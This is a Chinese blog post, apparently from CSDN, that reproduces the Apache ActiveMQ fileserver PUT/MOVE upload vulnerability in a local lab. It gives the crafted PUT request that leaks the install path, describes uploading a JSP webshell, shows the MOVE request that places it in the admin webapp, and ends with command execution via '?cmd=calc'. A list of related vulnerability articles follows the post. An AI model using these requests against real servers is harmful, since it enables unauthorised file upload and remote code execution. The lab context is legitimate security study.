Apache activeMQ漏洞复现put和move方法

最新推荐文章于 2024-06-01 09:55:44 发布
最新推荐文章于 2024-06-01 09:55:44 发布
阅读量2k 收藏 2
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43886632/article/details/89405498
版权

漏洞说明
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
1、ActiveMQ默认开启PUT MOVE等不安全的http方法
2、ActiveMQ的file server允许客户通过PUT上传文件

环境搭建
window 7 IP地址为192.168.17.173
配置java环境变量,下载jre
https://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html
双击运行一路下一步,然后配置环境变量。
可参考https://jingyan.baidu.com/article/6dad5075d1dc40a123e36ea3.html

下载有漏洞版本的ActiveMQ,这里下载的是5.7.0
地址为http://activemq.apache.org/download-archives.html
解压打开进入bin目录双击activemq启动
在这里插入图片描述访问http://192.168.17.173:8161/admin/
在这里插入图片描述自此环境搭建成功
打开Burp suite抓包
PUT /fileserver/a…/…/%08/…%08/.%08/%08 HTTP/1.1
爆出绝对路径
在这里插入图片描述
写入jsp代码
在这里插入图片描述移动
上传shell时,file server中是没有执行权限的,需要移动到admin中才能执行shell
PUT /fileserver/test.jsp HTTP/1.1
Destination: file:C:/Users/ruan/Desktop/apache-activemq-5.7.0/webapps/admin/test.jsp

在这里插入图片描述访问http://192.168.17.173:8161/admin/test.jsp?cmd=calc

在这里插入图片描述在这里插入图片描述

php00py
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mq put 消息到远程队列
zhaoyangjian724的专栏
11-30 1304
[mqm@yyjk sbin]$ cat put_mq_message.pl use MQSeries qw(:functions); use MQSeries::QueueManager; use MQSeries::Queue; use MQSeries::Message; use MQSeries::Command; use Data::Dumper; use M...
【文件上传漏洞-02】利用PUT方法上传文件—以Apache为例
m0_64378913的博客
05-31 6854
目录1 http协议请求方法概述2 Apache开启PUT请求方法的过程2.1 实验环境2.3 查询已开启的请求类型2.3 开启put方法3 文件上传漏洞利用3.1 上传PHP探针3.2 上传WebShell4 总结参考文章 1 http协议请求方法概述 具体http/https协议及通信过程可以参考文章《【基础协议】HTTP/HTTPS协议及其工作流程》 常见的请求方法及概述 GET:向特定的资源发出请求。 POST:向指定资源提交数据进行处理请求(例如提交表单或者上传文件)。数据被包含在请求体中。PO
ActiveMQ  任意文件上传 漏洞 PUT
U_U520的博客
01-10 1208
ActiveMQ Web控制台分为三个应用程序:其中admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;是消息队列的容器,专注于高并发的环境,比如天猫淘宝一秒钟上亿请求,就好比是水池,把大量短时间无法处理的数据,冗余囤积到ActiveMQ里,再分门别类,按类专门处理,从而提高处理效率。方法1 PUT /fileserver/a../../%08/..%08/.%08/%08。注意: 返回包必须是204 才能证明执行成功。
探索Apache ActiveMQ的安全边界:ActiveMQ-RCE工具深度解析
最新发布
gitblog_00081的博客
06-01 668
探索Apache ActiveMQ的安全边界:ActiveMQ-RCE工具深度解析 项目地址:https://gitcode.com/X1r0z/ActiveMQ-RCE 在安全研究与攻防对抗的前沿阵地,每一个新发现的漏洞都是对技术边界的一次挑战。今天,我们聚焦于一个名为ActiveMQ-RCE的开源工具,它专为应对近期曝光的严重安全漏洞CVE-2023-46604而生,是Go语言的杰作。本文将全...
MQ知识介绍
Kelly技术专栏
08-22 2422
 最近在学MQ,资料是英文版的,看得速度比较慢,后来发现了一本陈宇翔的,但是也是只有半本,先把系统连通之前的内容发上来,做概要了解用的。备忘。。 MQ的message由header和application message组成。MQ信息没有什么限制,只是一个物理消息的大小是0-100m。不过通常的最大信息长度是4M,也可以设置成100兆。头信息里包含:信息放到哪个队列中,信息的标识符(回复的
WebShpere MQ 配置与测试
Chatopera
10-31 1281
FROM:http://blog.sina.com.cn/s/blog_49a75433010008d5.html 在“WebSphere MQ程序设计初探”一文中,讨论了从MQ队列管理器的本地队列中放置和读出消息的程序,本文主要通过两台机器,搭建MQ消息传输的环境,并编写测试程序进行测试。 第一、准备工作 准备2台Win2000环境(XP也可),通过以太网连通。 机器A:代码为00000
apache-activemq-5.16.5
12-27
在实际应用中,Apache ActiveMQ常被用作企业级应用之间的消息桥梁,例如在微服务架构中,它可以帮助服务之间进行解耦通信,提高系统的稳定性和可扩展性。通过深入理解和熟练运用ActiveMQ,你可以构建出高效、可靠的...
apache-activemq-5.16.6-bin.zip
12-26
Apache ActiveMQ是世界上最流行的开源消息代理和队列服务器,它基于Java消息服务(JMS)规范,提供高可用性、可扩展性和强大的消息传递功能。这个"apache-activemq-5.16.6-bin.zip"文件包含了ActiveMQ的最新稳定版本...
apache-activemq-5.17.3
12-27
Apache ActiveMQ是开源的、基于Java消息服务(JMS)的应用服务器,它是Apache软件基金会的一部分。这个名为"apache-activemq-5.17.3"的压缩包包含了ActiveMQ的5.17.3版本,这是一个稳定且功能丰富的发布版本。在深入...
apache-activemq-5.15.9.rar
05-29
在“apache-activemq-5.15.9-bin.zip”中,包含了在Windows上运行Apache ActiveMQ所需的所有文件,包括可执行文件、配置文件和文档。 安装和启动Apache ActiveMQ相当简单。解压缩“apache-activemq-5.15.9”文件夹...
Apache activemq 5.15.5
10-28
阿帕奇的消息队列服务 品
IBM MQ开发通用方法,包括客户端连接、服务器端连接、发送接受消息
heweiyabeijing的专栏
04-14 2141
1,接口方法:IQueueManager.java。2,实现类方法:IbmMqImpl.java。
漏洞复现Apache_Tomcat_PUT方法任意写文件(CVE-2017-12615)
过期的秋刀鱼
11-04 772
当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。用burpsuite 进行抓包并做如下修改(GET请求改为PUT,修改名字,并在下面添加jsp的shell)即可看到Tomcat的Example页面。工具扫出来的结果,验证漏洞存在。
mq put 消息
zhaoyangjian724的专栏
04-19 537
BEGIN{push(@INC,"/usr/local/perl/lib/site_perl/5.22.1/x86_64-linux")}; use MQSeries qw(:functions); use MQSeries::QueueManager; # # # Simplest, trivial usage # # my $qmgr = MQSeries::Q...
mq put消息队列慢
adu1793的专栏
11-30 479
问题描述: java写的挡板程序,向响应队列put消息时:     消息 < 3000字节,put消息时间1ms     3000 < 消息 < 4000字节,put消息时间180ms     消息 > 5000,put消息时间1-2ms 环境: 1、在aix上测试时,jdk为ibm的jdk,现象如上描述 2、在windows上测试时,jdk为ibm/sun的jdk,大消息...
ActiveMq PUT任意文件上传漏洞(CVE-2016-3088)漏洞复现
weixin_74790320的博客
02-25 524
ActiveMQ Web控制台分为三个应用程序:其中admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。
CTF-PUT上传漏洞
不知名白帽的博客
05-27 761
CTF-PUT上传漏洞,实验环境:kali(192.168.20.128),靶机(192.168.20.137)。进行信息探测,漏洞扫描未发现有效信息后,测试PUT漏洞,发现存在PUT漏洞,下载插件Poster(RESTClient),然后上传大马反弹shell
PUT中间件上传漏洞
weixin_45007073的博客
01-13 2471
先介绍一下PUT上传漏洞的原理 我们常见的中间件有apache,tomcat,IIS,weblogic(其实就是web容器),这些中间件可以设置支持的HTTP方法。每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果中间件开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshell到对应的服务器上。 靶机搭建 链接:https://pan.baidu.com/s/1l_LILZgjUZ6ASrFQq9X22A 提取码:lsq0 漏洞复现 使用netd
MQ--MQPUT,MQGET
weixin_33978044的博客
08-22 467
MQPUT,MQGET时需注意将字符串转化为byte型在计算字符长度。 转载于:https://www.cnblogs.com/Calaio/archive/2006/08/22/483739.html
Apache ActiveMQ Artemis 消息队列编程指南
Apache ActiveMQ Artemis 是一种基于 Java 的开源消息队列服务器,旨在提供高性能、可靠和安全的消息传递服务。以下是 Apache ActiveMQ Artemis 编程指南的知识点总结: Messaging 概念 * 什么是消息队列?消息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值